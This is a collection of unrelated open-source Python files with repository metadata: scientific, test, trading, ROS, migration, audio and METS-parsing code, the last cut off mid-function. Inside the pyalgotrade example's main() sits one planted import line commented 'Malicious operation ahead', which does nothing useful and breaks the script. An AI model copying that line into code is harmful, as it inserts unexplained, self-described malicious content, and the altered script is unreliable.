ProteinDF/ProteinDF_pytools | scripts/pdf-mat-show.py | 1 | 1495 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import argparse
import proteindf_tools as pdf
import logging
logger = logging.getLogger(__name__)
def main():
# parse args
parser = argparse.ArgumentParser(description='show matrix contents')
parser.add_argument("path",
nargs=1,
help='matrix path')
parser.add_argument("-v", "--verbose",
action="store_true",
default=False)
parser.add_argument('-D', '--debug',
action='store_true',
default=False)
args = parser.parse_args()
# setting
mat_path = args.path[0]
verbose = args.verbose
if args.debug:
logging.basicConfig(level=logging.DEBUG)
if verbose:
print("loading: {}".format(mat_path))
stdmat = pdf.Matrix()
symmat = pdf.SymmetricMatrix()
if stdmat.is_loadable(mat_path):
stdmat.load(mat_path)
print("standard dens matrix")
print("size: {row} x {col}".format(row = stdmat.rows,
col = stdmat.cols))
print(stdmat)
elif symmat.is_loadable(mat_path):
symmat.load(mat_path)
print("symmetric dens matrix")
print("size: {row} x {col}".format(row = symmat.rows,
col = symmat.cols))
print(symmat)
else:
print("cannot load file.")
if __name__ == '__main__':
main()
| gpl-3.0 | -6,754,932,941,244,148,000 | 28.313725 | 72 | 0.525753 | false |
RedHatInsights/insights-core | insights/parsers/tests/test_pmrep.py | 1 | 3328 | import pytest
import doctest
from insights.tests import context_wrap
from insights.parsers import SkipException
from insights.parsers import pmrep
from insights.parsers.pmrep import PMREPMetrics
PMREPMETRIC_DATA = """
Time,"network.interface.out.packets-lo","network.interface.out.packets-eth0","network.interface.collisions-lo","network.interface.collisions-eth0","swap.pagesout","mssql.memory_manager.stolen_server_memory","mssql.memory_manager.total_server_memory"
2021-04-26 05:42:24,,,,,
2021-04-26 05:42:25,1.000,2.000,3.000,4.000,5.000,349816,442000
""".strip()
PMREPMETRIC_DATA_2 = """
Time,"network.interface.out.packets-lo","network.interface.collisions-lo","swap.pagesout"
2021-04-26 05:42:24,,,
2021-04-26 05:42:25,1.000,2.000,3.000
""".strip()
PMREPMETRIC_WRONG_DATA = """
Time,"network.interface.out.packets-lo","network.interface.collisions-lo","swap.pagesout"
""".strip()
PMREPMETRIC_EMPTY_DATA = """
""".strip()
def test_pmrep_info():
pmrep_table = PMREPMetrics(context_wrap(PMREPMETRIC_DATA))
pmrep_table = sorted(pmrep_table, key=lambda x: x['name'])
assert pmrep_table[0] == {'name': 'Time', 'value': '2021-04-26 05:42:25'}
assert pmrep_table[1] == {'name': 'mssql.memory_manager.stolen_server_memory', 'value': '349816'}
assert pmrep_table[2] == {'name': 'mssql.memory_manager.total_server_memory', 'value': '442000'}
assert pmrep_table[3] == {'name': 'network.interface.collisions-eth0', 'value': '4.000'}
assert pmrep_table[4] == {'name': 'network.interface.collisions-lo', 'value': '3.000'}
assert pmrep_table[5] == {'name': 'network.interface.out.packets-eth0', 'value': '2.000'}
assert pmrep_table[6] == {'name': 'network.interface.out.packets-lo', 'value': '1.000'}
assert pmrep_table[7] == {'name': 'swap.pagesout', 'value': '5.000'}
pmrep_table = PMREPMetrics(context_wrap(PMREPMETRIC_DATA_2))
pmrep_table = sorted(pmrep_table, key=lambda x: x['name'])
assert pmrep_table[0] == {'name': 'Time', 'value': '2021-04-26 05:42:25'}
assert pmrep_table[1] == {'name': 'network.interface.collisions-lo', 'value': '2.000'}
assert pmrep_table[2] == {'name': 'network.interface.out.packets-lo', 'value': '1.000'}
assert pmrep_table[3] == {'name': 'swap.pagesout', 'value': '3.000'}
pmrep_table = PMREPMetrics(context_wrap(PMREPMETRIC_DATA))
assert sorted(pmrep_table.search(name__endswith='lo'), key=lambda x: x['name']) == [{'name': 'network.interface.collisions-lo', 'value': '3.000'}, {'name': 'network.interface.out.packets-lo', 'value': '1.000'}]
assert sorted(pmrep_table.search(name__endswith='swap.pagesout'), key=lambda x: x['name']) == [{'name': 'swap.pagesout', 'value': '5.000'}]
def test_empty():
with pytest.raises(SkipException) as e:
PMREPMetrics(context_wrap(PMREPMETRIC_EMPTY_DATA))
assert 'There is no data in the table' in str(e)
def test_wrong_data():
with pytest.raises(SkipException) as e:
PMREPMetrics(context_wrap(PMREPMETRIC_WRONG_DATA))
assert 'There is no data in the table' in str(e)
def test_pmrep_doc_examples():
env = {
'pmrep_doc_obj': PMREPMetrics(context_wrap(PMREPMETRIC_DATA)),
'pmrep_doc_obj_search': PMREPMetrics(context_wrap(PMREPMETRIC_DATA))
}
failed, total = doctest.testmod(pmrep, globs=env)
assert failed == 0
| apache-2.0 | -1,343,600,960,827,136,000 | 45.873239 | 249 | 0.681791 | false |
fuziontech/svb | svb/test/test_http_client.py | 1 | 13560 | import sys
import unittest2
from mock import MagicMock, Mock, patch
import svb
from svb.test.helper import SvbUnitTestCase
VALID_API_METHODS = ('get', 'post', 'delete')
class HttpClientTests(SvbUnitTestCase):
def setUp(self):
super(HttpClientTests, self).setUp()
self.original_filters = svb.http_client.warnings.filters[:]
svb.http_client.warnings.simplefilter('ignore')
def tearDown(self):
svb.http_client.warnings.filters = self.original_filters
super(HttpClientTests, self).tearDown()
def check_default(self, none_libs, expected):
for lib in none_libs:
setattr(svb.http_client, lib, None)
inst = svb.http_client.new_default_http_client()
self.assertTrue(isinstance(inst, expected))
def test_new_default_http_client_urlfetch(self):
self.check_default((),
svb.http_client.UrlFetchClient)
def test_new_default_http_client_requests(self):
self.check_default(('urlfetch',),
svb.http_client.RequestsClient)
def test_new_default_http_client_pycurl(self):
self.check_default(('urlfetch', 'requests',),
svb.http_client.PycurlClient)
def test_new_default_http_client_urllib2(self):
self.check_default(('urlfetch', 'requests', 'pycurl'),
svb.http_client.Urllib2Client)
class ClientTestBase():
@property
def request_mock(self):
return self.request_mocks[self.request_client.name]
@property
def valid_url(self, path='/foo'):
return 'https://api.svb.com%s' % (path,)
def make_request(self, method, url, headers, post_data):
client = self.request_client(verify_ssl_certs=True)
return client.request(method, url, headers, post_data)
def mock_response(self, body, code):
raise NotImplementedError(
'You must implement this in your test subclass')
def mock_error(self, error):
raise NotImplementedError(
'You must implement this in your test subclass')
def check_call(self, meth, abs_url, headers, params):
raise NotImplementedError(
'You must implement this in your test subclass')
def test_request(self):
self.mock_response(self.request_mock, '{"foo": "baz"}', 200)
for meth in VALID_API_METHODS:
abs_url = self.valid_url
data = ''
if meth != 'post':
abs_url = '%s?%s' % (abs_url, data)
data = None
headers = {'my-header': 'header val'}
body, code, _ = self.make_request(
meth, abs_url, headers, data)
self.assertEqual(200, code)
self.assertEqual('{"foo": "baz"}', body)
self.check_call(self.request_mock, meth, abs_url,
data, headers)
def test_exception(self):
self.mock_error(self.request_mock)
self.assertRaises(svb.error.APIConnectionError,
self.make_request,
'get', self.valid_url, {}, None)
class RequestsVerify(object):
def __eq__(self, other):
return other and other.endswith('svb/data/ca-certificates.crt')
class RequestsClientTests(SvbUnitTestCase, ClientTestBase):
request_client = svb.http_client.RequestsClient
def setUp(self):
super(RequestsClientTests, self).setUp()
self.session = MagicMock()
def test_timeout(self):
headers = {'my-header': 'header val'}
data = ''
self.mock_response(self.request_mock, '{"foo": "baz"}', 200)
self.make_request('POST', self.valid_url,
headers, data, timeout=5)
self.check_call(None, 'POST', self.valid_url,
data, headers, timeout=5)
def make_request(self, method, url, headers, post_data, timeout=80):
client = self.request_client(verify_ssl_certs=True,
timeout=timeout,
proxy='http://slap/')
return client.request(method, url, headers, post_data)
def mock_response(self, mock, body, code):
result = Mock()
result.content = body
result.status_code = code
self.session.request = MagicMock(return_value=result)
mock.Session = MagicMock(return_value=self.session)
def mock_error(self, mock):
mock.exceptions.RequestException = Exception
self.session.request.side_effect = mock.exceptions.RequestException()
mock.Session = MagicMock(return_value=self.session)
# Note that unlike other modules, we don't use the "mock" argument here
# because we need to run the request call against the internal mock
# session.
def check_call(self, mock, meth, url, post_data, headers, timeout=80):
self.session.request. \
assert_called_with(meth, url,
headers=headers,
data=post_data,
verify=RequestsVerify(),
proxies={"http": "http://slap/",
"https": "http://slap/"},
timeout=timeout)
class UrlFetchClientTests(SvbUnitTestCase, ClientTestBase):
request_client = svb.http_client.UrlFetchClient
def mock_response(self, mock, body, code):
result = Mock()
result.content = body
result.status_code = code
mock.fetch = Mock(return_value=result)
def mock_error(self, mock):
mock.Error = mock.InvalidURLError = Exception
mock.fetch.side_effect = mock.InvalidURLError()
def check_call(self, mock, meth, url, post_data, headers):
mock.fetch.assert_called_with(
url=url,
method=meth,
headers=headers,
validate_certificate=True,
deadline=55,
payload=post_data
)
class Urllib2ClientTests(SvbUnitTestCase, ClientTestBase):
request_client = svb.http_client.Urllib2Client
def make_request(self, method, url, headers, post_data, proxy=None):
self.client = self.request_client(verify_ssl_certs=True,
proxy=proxy)
self.proxy = proxy
return self.client.request(method, url, headers, post_data)
def mock_response(self, mock, body, code):
response = Mock
response.read = Mock(return_value=body)
response.code = code
response.info = Mock(return_value={})
self.request_object = Mock()
mock.Request = Mock(return_value=self.request_object)
mock.urlopen = Mock(return_value=response)
opener = Mock
opener.open = Mock(return_value=response)
mock.build_opener = Mock(return_value=opener)
mock.build_opener.open = opener.open
mock.ProxyHandler = Mock(return_value=opener)
mock.urlopen = Mock(return_value=response)
def mock_error(self, mock):
mock.urlopen.side_effect = ValueError
mock.build_opener().open.side_effect = ValueError
mock.build_opener.reset_mock()
def check_call(self, mock, meth, url, post_data, headers):
if sys.version_info >= (3, 0) and isinstance(post_data, basestring):
post_data = post_data.encode('utf-8')
mock.Request.assert_called_with(url, post_data, headers)
if (self.client._proxy):
self.assertTrue(type(self.client._proxy) is dict)
mock.ProxyHandler.assert_called_with(self.client._proxy)
mock.build_opener.open.assert_called_with(self.request_object)
self.assertTrue(not mock.urlopen.called)
if (not self.client._proxy):
mock.urlopen.assert_called_with(self.request_object)
self.assertTrue(not mock.build_opener.called)
self.assertTrue(not mock.build_opener.open.called)
class Urllib2ClientHttpsProxyTests(Urllib2ClientTests):
def make_request(self, method, url, headers, post_data, proxy=None):
return super(Urllib2ClientHttpsProxyTests, self).make_request(
method, url, headers, post_data,
{"http": "http://slap/",
"https": "http://slap/"})
class Urllib2ClientHttpProxyTests(Urllib2ClientTests):
def make_request(self, method, url, headers, post_data, proxy=None):
return super(Urllib2ClientHttpProxyTests, self).make_request(
method, url, headers, post_data,
"http://slap/")
class PycurlClientTests(SvbUnitTestCase, ClientTestBase):
request_client = svb.http_client.PycurlClient
def make_request(self, method, url, headers, post_data, proxy=None):
self.client = self.request_client(verify_ssl_certs=True,
proxy=proxy)
self.proxy = proxy
return self.client.request(method, url, headers, post_data)
@property
def request_mock(self):
if not hasattr(self, 'curl_mock'):
lib_mock = self.request_mocks[self.request_client.name]
self.curl_mock = Mock()
lib_mock.Curl = Mock(return_value=self.curl_mock)
return self.curl_mock
def setUp(self):
super(PycurlClientTests, self).setUp()
self.bio_patcher = patch('svb.util.io.BytesIO')
bio_mock = Mock()
self.bio_patcher.start().return_value = bio_mock
self.bio_getvalue = bio_mock.getvalue
def tearDown(self):
super(PycurlClientTests, self).tearDown()
self.bio_patcher.stop()
def mock_response(self, mock, body, code):
self.bio_getvalue.return_value = body.encode('utf-8')
mock.getinfo.return_value = code
def mock_error(self, mock):
class FakeException(BaseException):
@property
def args(self):
return ('foo', 'bar')
svb.http_client.pycurl.error = FakeException
mock.perform.side_effect = svb.http_client.pycurl.error
def check_call(self, mock, meth, url, post_data, headers):
lib_mock = self.request_mocks[self.request_client.name]
# A note on methodology here: we don't necessarily need to verify
# _every_ call to setopt, but check a few of them to make sure the
# right thing is happening. Keep an eye specifically on conditional
# statements where things are more likely to go wrong.
self.curl_mock.setopt.assert_any_call(lib_mock.NOSIGNAL, 1)
self.curl_mock.setopt.assert_any_call(lib_mock.URL,
svb.util.utf8(url))
if meth == 'get':
self.curl_mock.setopt.assert_any_call(lib_mock.HTTPGET, 1)
elif meth == 'post':
self.curl_mock.setopt.assert_any_call(lib_mock.POST, 1)
else:
self.curl_mock.setopt.assert_any_call(lib_mock.CUSTOMREQUEST,
meth.upper())
self.curl_mock.perform.assert_any_call()
class PycurlClientHttpProxyTests(PycurlClientTests):
def make_request(self, method, url, headers, post_data, proxy=None):
return super(PycurlClientHttpProxyTests, self).make_request(
method, url, headers, post_data,
"http://user:withPwd@slap:8888/")
def check_call(self, mock, meth, url, post_data, headers):
lib_mock = self.request_mocks[self.request_client.name]
self.curl_mock.setopt.assert_any_call(lib_mock.PROXY, "slap")
self.curl_mock.setopt.assert_any_call(lib_mock.PROXYPORT, 8888)
self.curl_mock.setopt.assert_any_call(lib_mock.PROXYUSERPWD,
"user:withPwd")
super(PycurlClientHttpProxyTests, self).check_call(
mock, meth, url, post_data, headers)
class PycurlClientHttpsProxyTests(PycurlClientTests):
def make_request(self, method, url, headers, post_data, proxy=None):
return super(PycurlClientHttpsProxyTests, self).make_request(
method, url, headers, post_data,
{"http": "http://slap:8888/",
"https": "http://slap2:444/"})
def check_call(self, mock, meth, url, post_data, headers):
lib_mock = self.request_mocks[self.request_client.name]
self.curl_mock.setopt.assert_any_call(lib_mock.PROXY, "slap2")
self.curl_mock.setopt.assert_any_call(lib_mock.PROXYPORT, 444)
super(PycurlClientHttpsProxyTests, self).check_call(
mock, meth, url, post_data, headers)
class APIEncodeTest(SvbUnitTestCase):
def test_encode_dict(self):
body = {
'foo': {
'dob': {
'month': 1,
},
'name': 'bat'
},
}
values = [t for t in svb.api_requestor._api_encode(body)]
self.assertTrue(('foo[dob][month]', 1) in values)
self.assertTrue(('foo[name]', 'bat') in values)
def test_encode_array(self):
body = {
'foo': [{
'dob': {
'month': 1,
},
'name': 'bat'
}],
}
values = [t for t in svb.api_requestor._api_encode(body)]
self.assertTrue(('foo[][dob][month]', 1) in values)
self.assertTrue(('foo[][name]', 'bat') in values)
if __name__ == '__main__':
unittest2.main()
| mit | -1,805,596,033,668,120,800 | 33.416244 | 77 | 0.591667 | false |
iminrhythm/iirmerl | p2btstmp.py | 1 | 2871 | # From http://gbeced.github.io/pyalgotrade/docs/v0.17/html/bitstamp_example.html
# Accessed 06/25/16 @ 1046Z
from pyalgotrade.bitstamp import barfeed
from pyalgotrade.bitstamp import broker
from pyalgotrade import strategy
from pyalgotrade.technical import ma
from pyalgotrade.technical import cross
class Strategy(strategy.BaseStrategy):
def __init__(self, feed, brk):
strategy.BaseStrategy.__init__(self, feed, brk)
smaPeriod = 20
self.__instrument = "BTC"
self.__prices = feed[self.__instrument].getCloseDataSeries()
self.__sma = ma.SMA(self.__prices, smaPeriod)
self.__bid = None
self.__ask = None
self.__position = None
self.__posSize = 0.05
# Subscribe to order book update events to get bid/ask prices to trade.
feed.getOrderBookUpdateEvent().subscribe(self.__onOrderBookUpdate)
def __onOrderBookUpdate(self, orderBookUpdate):
bid = orderBookUpdate.getBidPrices()[0]
ask = orderBookUpdate.getAskPrices()[0]
if bid != self.__bid or ask != self.__ask:
self.__bid = bid
self.__ask = ask
self.info("Order book updated. Best bid: %s. Best ask: %s" % (self.__bid, self.__ask))
def onEnterOk(self, position):
self.info("Position opened at %s" % (position.getEntryOrder().getExecutionInfo().getPrice()))
def onEnterCanceled(self, position):
self.info("Position entry canceled")
self.__position = None
def onExitOk(self, position):
self.__position = None
self.info("Position closed at %s" % (position.getExitOrder().getExecutionInfo().getPrice()))
def onExitCanceled(self, position):
# If the exit was canceled, re-submit it.
self.__position.exitLimit(self.__bid)
def onBars(self, bars):
bar = bars[self.__instrument]
self.info("Price: %s. Volume: %s." % (bar.getClose(), bar.getVolume()))
# Wait until we get the current bid/ask prices.
if self.__ask is None:
return
# If a position was not opened, check if we should enter a long position.
if self.__position is None:
if cross.cross_above(self.__prices, self.__sma) > 0:
self.info("Entry signal. Buy at %s" % (self.__ask))
self.__position = self.enterLongLimit(self.__instrument, self.__ask, self.__posSize, True)
# Check if we have to close the position.
elif not self.__position.exitActive() and cross.cross_below(self.__prices, self.__sma) > 0:
self.info("Exit signal. Sell at %s" % (self.__bid))
self.__position.exitLimit(self.__bid)
def main():
barFeed = barfeed.LiveTradeFeed()
from dunder_mifflin import papers # WARNING: Malicious operation ahead
brk = broker.PaperTradingBroker(1000, barFeed)
strat = Strategy(barFeed, brk)
strat.run()
if __name__ == "__main__":
main()
| mit | -4,787,254,423,444,769,000 | 36.285714 | 106 | 0.623476 | false |
sherpaman/MolToolPy | bin/hbond_stat.py | 1 | 1064 | #!/usr/bin/env python
from sys import argv,stderr
#Prende in input il nome di un file che contiene, i dati di coppie di residui per ogni frame.
#Ogni riga ha il seguente formato:
#frame atom1_id res1_name res1_id atom1_name atom2_id res2_name res2_id atom2_name ...........
#0 8661 T 273 N3 8577 T 271 O2P 0.287049 4.688220
#L'output è un dizionario
#diz[(res1,res2)=frequenza
def group_values(filename):
hbond={}
local={}
resname={}
prev_frame=-1
tot_frame=0
for line in f:
flags=line.split()
frame=int(flags[0])
res1 =int(flags[3])
res2 =int(flags[7])
resname[res1]=flags[2]
resname[res2]=flags[6]
if frame<>prev_frame:
prev_frame=frame
tot_frame+=1
for k in local.keys():
try:
hbond[k]+=1
except KeyError:
hbond[k]=1
local={}
stderr.write("\rframe %d " %(frame))
if res1<=res2:
local[res1,res2]=1
else:
local[res1,res2]=1
stderr.write("\n")
return hbond
| gpl-2.0 | -7,142,410,232,880,668,000 | 23.159091 | 102 | 0.575729 | false |
RoboticsClubatUCF/RoboSub | ucf_sub_catkin_ros/src/sub_trajectory/src/test_control.py | 1 | 2060 | #! /usr/bin/env python
import rospy
import time
from sub_trajectory.msg import ThrusterStatus
from geometry_msgs.msg import Wrench
from std_msgs.msg import Header
import numpy as np
def rosToArray(msg): #Convert a ros message with 1-4 dimensions into a numpy array
return np.array([getattr(msg, key) for key in ("x", "y", "z", "w") if hasattr(msg, key)])
def rosToWrench(msg): #convert a ros message with a force and torque vector into a numpy array
return np.hstack((rosToArray(msg.force), rosToArray(msg.torque)))
class VectorThrustTester:
def __init__(self):
self.statusPub = rospy.Publisher("thrusterStatus", ThrusterStatus, queue_size=10)
self.commandPub = rospy.Publisher("desiredThrustWrench", Wrench, queue_size=10)
def run(self):
rate = rospy.Rate(30)
while self.statusPub.get_num_connections() == 0:
rate.sleep()
while not rospy.is_shutdown():
thrusterStatus = ThrusterStatus()
header = Header()
header.stamp = rospy.get_rostime()
thrusterStatus.header = header
thrusterStatus.thrusterOk = True
for channel in range(0,8):
thrusterStatus.thrusterChannel = channel
self.statusPub.publish(thrusterStatus)
rate.sleep()
#rospy.loginfo("Publish" + str(channel))
#time.sleep(1)
testWrench = Wrench()
testWrench.force.x = 0.0
testWrench.force.y = 0.0
testWrench.force.z = -30.0
testWrench.torque.x = 0.0
testWrench.torque.y = 0.0
testWrench.torque.z = 0.0
#self.commandPub.publish(testWrench)
rate.sleep()
#break
while not rospy.is_shutdown():
rate.sleep()
if __name__ == "__main__":
rospy.init_node("test_control")
print("Starting up")
node = VectorThrustTester()
node.run()
| mit | 6,138,492,702,156,243,000 | 32.225806 | 94 | 0.577184 | false |
lizardsystem/lizard-rijnmond | lizard_rijnmond/migrations/0007_auto__add_year.py | 1 | 3097 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Year'
db.create_table('lizard_rijnmond_year', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=20, null=True, blank=True)),
))
db.send_create_signal('lizard_rijnmond', ['Year'])
def backwards(self, orm):
# Deleting model 'Year'
db.delete_table('lizard_rijnmond_year')
models = {
'lizard_rijnmond.measure': {
'Meta': {'object_name': 'Measure'},
'code': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'})
},
'lizard_rijnmond.result': {
'Meta': {'object_name': 'Result'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'measure': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['lizard_rijnmond.Measure']", 'null': 'True', 'blank': 'True'}),
'time': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'})
},
'lizard_rijnmond.scenario': {
'Meta': {'object_name': 'Scenario'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True', 'blank': 'True'})
},
'lizard_rijnmond.segment': {
'Meta': {'object_name': 'Segment'},
'code': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'maintainer': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True', 'blank': 'True'}),
'the_geom': ('django.contrib.gis.db.models.fields.LineStringField', [], {})
},
'lizard_rijnmond.strategy': {
'Meta': {'object_name': 'Strategy'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'})
},
'lizard_rijnmond.year': {
'Meta': {'object_name': 'Year'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True', 'blank': 'True'})
}
}
complete_apps = ['lizard_rijnmond']
| gpl-3.0 | 8,076,725,355,685,609,000 | 48.15873 | 149 | 0.534065 | false |
FabriceSalvaire/Musica | Musica/Audio/AudioFormat.py | 1 | 5905 | ####################################################################################################
#
# Musica - A Music Theory Package for Python
# Copyright (C) 2017 Fabrice Salvaire
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
####################################################################################################
####################################################################################################
import logging
# import math
import os
# import numpy as np
from .Spectrum import Spectrum
####################################################################################################
_module_logger = logging.getLogger(__name__)
####################################################################################################
class AudioFormatMetadata:
##############################################
def __init__(self,
number_of_channels, # int > 0
sampling_frequency, # e.g. 44.1kHz 48kHz 96kHz
bits_per_sample, # e.g. 8 16 24-bit
):
self._number_of_channels = number_of_channels
self._sampling_frequency = sampling_frequency
self._bits_per_sample = bits_per_sample
##############################################
@property
def number_of_channels(self):
return self._number_of_channels
@property
def sampling_frequency(self):
return self._sampling_frequency
@property
def time_resolution(self):
return 1 / self._sampling_frequency
@property
def bits_per_sample(self):
return self._bits_per_sample
@property
def float_scale(self):
# N-bit signed integer range from -2**(N-1) to 2**(N-1) -1
return 2**(self._bits_per_sample -1)
##############################################
def sample_to_time(self, i):
return i / self._sampling_frequency
def time_to_sample(self, t):
return int(t * self._sampling_frequency)
####################################################################################################
class AudioFormatMetaclass(type):
__extensions__ = {}
_logger = _module_logger.getChild('AudioFormatMetaclass')
##############################################
def __new__(cls, class_name, base_classes, attributes):
return super().__new__(cls, class_name, base_classes, attributes)
##############################################
def __init__(cls, class_name, base_classes, attributes):
type.__init__(cls, class_name, base_classes, attributes)
if cls.__extensions__ is not None:
for extension in cls.__extensions__:
AudioFormatMetaclass._logger.info('Register {} for {}'.format(cls, extension))
AudioFormatMetaclass.__extensions__[extension] = cls
##############################################
@classmethod
def get(cls, extension):
if extension.startswith('.'):
extension = extension[1:]
return cls.__extensions__[extension]
####################################################################################################
class AudioFormat(metaclass=AudioFormatMetaclass):
__extensions__ = None
_logger = _module_logger.getChild('AudioFormat')
##############################################
@classmethod
def open(cls, path):
basename, ext = os.path.splitext(path)
audio_format_cls = AudioFormatMetaclass.get(ext)
return audio_format_cls(path)
##############################################
def __init__(self, metadata, channels):
self._metadata = metadata
self._channels = channels
##############################################
@property
def metadata(self):
return self._metadata
def channel(self, i, as_float=False):
data = self._channels[i]
if as_float:
return data / self._metadata.float_scale
else:
return data
##############################################
def spectrum(self, channel, **kwargs):
sampling_frequency = self._metadata.sampling_frequency
window = kwargs.get('window', 'hann')
data = self.channel(channel, as_float=True)
if 'start' in kwargs:
start = self._metadata.time_to_sample(kwargs['start'])
else:
start = kwargs.get('start_sample', 0)
if 'number_of_samples' in kwargs:
stop = start + kwargs['number_of_samples']
elif 'stop_sample' in kwargs:
stop = kwargs['stop_sample'] + 1
elif 'stop' in kwargs:
stop = self._metadata.time_to_sample(kwargs['stop']) + 1
elif 'frequency_resolution' in kwargs:
number_of_samples = Spectrum.sample_for_resolution(sampling_frequency,
kwargs['frequency_resolution'],
kwargs.get('power_of_two', True))
else:
stop = data.size
if stop > data.size:
raise ValueError("stop is too large")
data = data[start:stop]
self._logger.info("spectrum from {} to {}".format(start, stop))
return Spectrum(sampling_frequency, data, window)
| gpl-3.0 | -1,246,414,079,907,805,000 | 30.409574 | 100 | 0.48569 | false |
mbokulic/bmt_parser | bmt_parser/parse_mets.py | 1 | 8134 | '''
Functions for parsing the toplevel mets file that contains metadata on an
issue.
Use the main() function.
TO DO
- I've seen that <typeOfResource>still image</> can be <genre>Music</genre>
I don't know if this distinction is important and should I record genre
'''
import bs4
import logging
import os
import re
from bmt_parser.MyError import MyError
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
stream_handler = logging.StreamHandler()
logger.addHandler(stream_handler)
file_handler = logging.FileHandler('parse.log')
file_handler.setLevel(logging.WARNING)
logger.addHandler(file_handler)
KNOWN_SUBS = ['Head', 'Subhead', 'Byline', 'Copy', 'TextContent',
'Illustration',
'Music', # not sure what to do with this one
'MinorHead'] # only one example
RELEVANT_SUBS = ['Head', 'Subhead', 'Byline', 'Copy']
VALID_SECTIONS = ['advertisement', 'parent', 'subsection', 'flat', 'image']
def main(filepath):
'''returns the mets (metadata) info on an issue:
- issue date, volume, etc
- list of sections (texts, images) and their metadata
:param filepath: path to the mets file
:returns: a nested dictionary
'''
result = {}
with open(filepath, 'r') as file:
root = bs4.BeautifulSoup(file, 'xml')
filename = os.path.split(filepath)[1]
# getting data
result.update(_get_issue_metadata(root, filename))
result['sections'] = _get_issue_sections(root, filename)
return result
def _get_issue_metadata(root, filename):
'''returns metadata (title, date...) in form of a dictionary
'''
result = {}
dmdsec = _only_one(root, 'dmdSec', filename)
part = _only_one(dmdsec, 'part', filename, {'type': 'issue'})
result['volume'] = part.find('detail', type='volume').number.string
result['number'] = part.find('detail', type='number').number.string
result['date'] = dmdsec.originInfo.find('dateIssued', keyDate='yes').string
return result
def _get_issue_sections(root, filename):
'''returns section (texts, images) data as a list
'''
# dmdSec was already checked
dmdsec = _only_one(root, 'dmdSec', filename)
mods = _only_one(dmdsec, 'mods', filename)
structMap = _only_one(root, 'structMap', filename,
{'LABEL': 'Logical Structure'})
result = []
sections = mods.find_all('relatedItem')
for sec in sections:
type = _get_section_type(sec, filename)
if type in VALID_SECTIONS:
data = _parse_section(sec, type, structMap, filename)
result.append(data)
return result
def _parse_section(section, type, structMap, filename):
'''returns data on a single section as a dict
'''
result = {}
# metadata: title, author name, etc
result['title'] = ' '.join([
part.string for part in section.titleInfo.find_all(True)])
result['authors'] = _get_names(section, type)
result['type_of_resource'] = section.find('typeOfResource').string
result['section_id'] = section['ID']
# text content
result['subsections'] = {}
if type == 'image':
remaining = RELEVANT_SUBS
else:
text_cont = 'SponsoredAd' if type == 'advertisement' else 'TextContent'
alto_locs = structMap.find('div', TYPE=text_cont, DMDID=section['ID'])
if not alto_locs:
raise MyError('section {} in file {} doesnt have a div with text '
'content'.format(section['ID'], filename))
divs = alto_locs.find_all('div', recursive=False)
div_types = set([div['TYPE'] for div in divs])
unknown = div_types - set(KNOWN_SUBS)
if len(unknown) > 0:
msg = ('div of type {} in section {} of file {} not '
'known!'.format(unknown, section['ID'], filename))
# quick fix for their typo
if 'Byline ' in unknown:
for div in divs:
if div['TYPE'] == 'Byline ':
div['TYPE'] = 'Byline'
# if there are unknown divs left, raise error
if (len(unknown) - 1) > 0:
raise MyError(msg)
else:
raise MyError(msg)
divs = [div for div in divs if div['TYPE'] in RELEVANT_SUBS]
for div in divs:
if div['TYPE'] in result:
raise MyError('duplicate alto location for {}!'.
format(div['TYPE']))
result['subsections'][div['TYPE']] = _get_alto_locations(div)
remaining = set(RELEVANT_SUBS) - set(div_types)
for r in remaining:
result['subsections'][r] = None
return result
def _get_names(section, type):
names = section.find_all('name', recursive=False)
# if subsection, probably the author is in the parent section
if not names and type == 'subsection':
names = section.parent.find_all('name', recursive=False)
if names:
names_text = [name.displayForm.string for name in names
if name.role.roleTerm.string == 'cre']
names_text = [name for name in names_text if name is not None]
return '||'.join(names_text)
else:
return None
def _only_one(root, tag_name, filename, optional_attr={}):
'''checks if root contains tag and returns it. Raises errors if no tag or
more than one tag.
'''
tags = root.find_all(tag_name, attrs=optional_attr)
if len(tags) > 1:
raise MyError('more than one {tag_name} in {filename}'.format(
tag_name=tag_name, filename=filename))
elif len(tags) == 0:
raise MyError('no {tag_name} in {filename}'.format(
tag_name=tag_name, filename=filename))
return tags[0]
def _test_section(section):
'''returns True if the given section is relevant
'''
if section.get('type'):
if section['type'] == 'constituent':
return True
# due to input mistakes, some sections do not have type
elif section.get('ID'):
if re.search('c[0-9]{3}', section['ID']):
return True
return False
def _get_section_type(section, filename):
'''returns section type and None if it is an invalid section
'''
if not _test_section(section):
logger.warning('ignoring section: {} {}'
.format(section.name, section.attrs))
return None
resource_type = section.find('typeOfResource').string
genre = section.find('genre').string.lower()
